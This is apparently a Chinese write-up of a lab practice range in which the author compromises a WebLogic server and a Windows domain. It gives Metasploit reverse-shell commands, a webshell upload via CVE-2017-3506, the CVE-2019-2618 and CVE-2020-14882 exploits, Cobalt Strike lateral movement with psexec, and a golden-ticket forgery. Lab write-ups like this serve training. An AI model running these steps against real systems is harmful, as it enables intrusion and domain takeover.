红日靶场2

红日2

打靶前准备

1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入

2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0

红日靶场2_第1张图片

设置一个lan区段,所有主机都加入到这个lan区段

结果如下:

红日靶场2_第2张图片

3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是一些软件不敢放在主机上

他们之间的连接关系如下:##用ensp,主机只有一个接口,截图又没有直线,我真是醉了

红日靶场2_第3张图片

注意:这里内外网只是相对于这些虚拟主机的。

主机 外网ip 内网ip
PC.de1ay.com 192.168.111.201 10.10.10.201
WEB.de1ay.com 192.168.111.80 10.10.10.80
DC.de1ay.com 10.10.10.10
攻击机若干 192.168.111.0网段就行

4、打开web主机,进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin右击以管理员身份

运行startWeblogic。需要管理员身份:administrator/1qaz@WSX

最后web以及pc 通过管理员的方法打开服务。确保Server、Workstation、Computer Browser服务能够启动

开始工作:

1、信息收集:

1)主机信息收集

启动kail的nmap

nmap -sV 192.168.111.0/24 //显示系统以及程序版本信息

红日靶场2_第4张图片

红日靶场2_第5张图片

访问.80的ip #默认是访问80端口,啥都没有

红日靶场2_第6张图片

启动目录扫描

御剑:

红日靶场2_第7张图片

kail的dirsearch:

红日靶场2_第8张图片

上面出现的目录全都是啥都没有·················目前来说还是没有发现有用的信息。

2)扫描web的7001端口

御剑:扫了个寂寞,应该我是字典不够大

dirsearch:

红日靶场2_第9张图片

3)主机漏洞扫描

web主机漏洞扫描

可能存在的漏洞

端口 漏洞 描述
1433 CVE-2014-3566
3389 ms12-020.CVE-2012-0152
ms17-010、cve-2012-1182、ms10-061

pc主机漏洞扫描,情况同上

2、从web的7001端口入手

1)利用weblogicscan对网页进行扫描,本次用的版本低了

红日靶场2_第10张图片

优点:开源,容易安装(前提需要python环境),操作简单,能够发现CVE通用漏洞

缺点:界面不好(版本高点可能会更好),第一次用崩了。局限性:针对weblogicScan框架

2)利用AWVS:

红日靶场2_第11张图片

优点:效率还挺高,因为是自己搭建的靶场,所以线程开了最大。漏洞的大部分基本上都有了

缺点:难装。也是失败了好几次才能装成功。貌似没有通用漏洞

GitHub - 0xn0ne/weblogicScanner: weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883

!!!实战需要授权,允许使用工具才能用!!!

工具名称 web:top10 通用
AWVS 如上图 貌似没有发现
weblogicScan SSRF CVE-2019-2725、CVE-2017-3506、CVE-2018-2893
weblogicScanner CVE-2020-14882、CVE-2020-2883、CVE-2017-3506、CVE-2017-10271、CVE-2019-2725

weblogicScanner、weblogicScan都是针对weblogic服务的

尝试找到突破点之利用CVE-2019-2725打带域控

对CVE-2019-2725进行利用:

方法一,通过改包的方式执行命令,技术不足暂不实现

方法二,简单粗暴,kail!

kail启动msfconsole

serch cve-2019-2725   #查找这个漏洞对应的模块
​
use 0            #只有一个模块,也只能用它了
​
show options      #查找需要填写的参数
​
set payload windows/meterpreter/reverse_tcp  #设置攻击载荷,因为已经对方为windows系统
​
set lhost 本机ip 
​
set rhost 靶机ip
​
show targets  #查看设置的攻击目标系统,1为windows,主要是为了增加成功率
​
set target 1
​
run     #可能会失败,多run几次
tip:shell之后有乱码,可以chcp 65001

红日靶场2_第12张图片

arp -a 获取到了还有个10.10.10.10的主机

meterpreter之信息收集

route/arp -a 收集网络相关信息
sysinfo 收集主机系统配置
shell 进入shell主机

回首掏

忘记看看能不能提权了,居然成了~

3、连接CS

kail启动服务端

红日靶场2_第13张图片

CS连接进入

创建一个监听

红日靶场2_第14张图片

然后background退出来,会有一个session,exit退出来不会有session

background
​
use exploit/windows/local/payload_inject
​
set payload windows/meterpreter/reverse_http
​
set DisablePayloadHandler true
​
set lhost 192.168.111.123
​
set lport 6688
​
run

CS上线

红日靶场2_第15张图片

4、内网信息收集

CS

  elevate svc-exe test #提权 看图一
  shell  ipconfig\all  #图二
  shell net user \domain # 查看域信息

红日靶场2_第16张图片

图 一

红日靶场2_第17张图片

图 二

红日靶场2_第18张图片

红日靶场2_第19张图片

获取密码:得出密码为1qaz@WSX

红日靶场2_第20张图片

5、通过CS拿下域控

创一个smb类型的监听

红日靶场2_第21张图片

rev2self
​
make_token de1ay.com\administrator 1qaz@WSX
​
jump psexec DC smb

域控就拿下来了

红日靶场2_第22张图片

小总结,通过cs操作明显比msf更加简单。

CVE-2017-3506

访问ip:7001/wls-wsat/CoordinatorPortType11 weblogic默认为7001端口,具体端口视情况而定。如果出现下图,则说明存在该漏洞

红日靶场2_第23张图片

下载工具:https://github.com/Al1ex/CVE-2017-3506

再验证一波: ###还是不要偷懒···少打了http://就监测不了了

红日靶场2_第24张图片

通过 java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp 上传后门

访问: http://192.168.111.80:7001/wls-wsat/shell.jsp?password=secfree&command=whoami

红日靶场2_第25张图片

漏洞修复 :

待补充

CVE-2019-2618

工具下载地址:https://github.com/jas502n/cve-2019-2618

python2 cve-2019-2618.py http://192.168.111.80:7001 weblogic 1qaz@WSX

红日靶场2_第26张图片

访问提升的shell.jsp

红日靶场2_第27张图片

目前还不会通过命令行写入后门,而且还需要知道该机web服务的根目录才能使后门木马被我们所连接

CVE-2020-14882

未授权访问。可以直接访问后台。并执行命令

payload:

/console/images/%252E%252E%252Fconsole.portal

其中%252e%252e%252f是经过url的二次编码,其含义为../

红日靶场2_第28张图片

代码分析参考:CVE-2020-14882:Weblogic Console 权限绕过深入解析 - 360CERT

最后伪造TGT :黄金票据

根据收集的信息

在域控上:执行黄票票据

红日靶场2_第29张图片

红日靶场2_第30张图片

红日靶场2_第31张图片

用户名可以随意,其他的按收集的信息填写。#因为黄金票据不需要经过AS(认证服务)了,也就无需登录。因为kerberos系统的安全基于AS和TGS的绝对信任,所以TGS不会再次对用户信息进行验证。

红日靶场2_第32张图片

成功:

红日靶场2_第33张图片

总结:

虽然利用AWVS扫描出来了几个风险漏洞,但并不容易利用,虽然暂时不去实现。另外利用nmap扫描出来的其余漏洞也暂时不去实现。因为都是利用msf去跑就行了。具体就是

msfconsole

search 漏洞的编号 ##查看msf是否有该漏洞的攻击方法

use x #选择想要的攻击模块

show options #查看需要填写的参数

show targets #查看是否需要更改对面系统信息

set ····· #设置对应的参数

run #

目前就复现以上的漏洞,还有很多的操作没有实现,日后学成再尝试打打。最遗憾的就是没有能够留下后门,主要原因是未能懂得如何在get到webshell的情况下写入一个木马。

未完待续······················

你可能感兴趣的:(网络,服务器,web安全)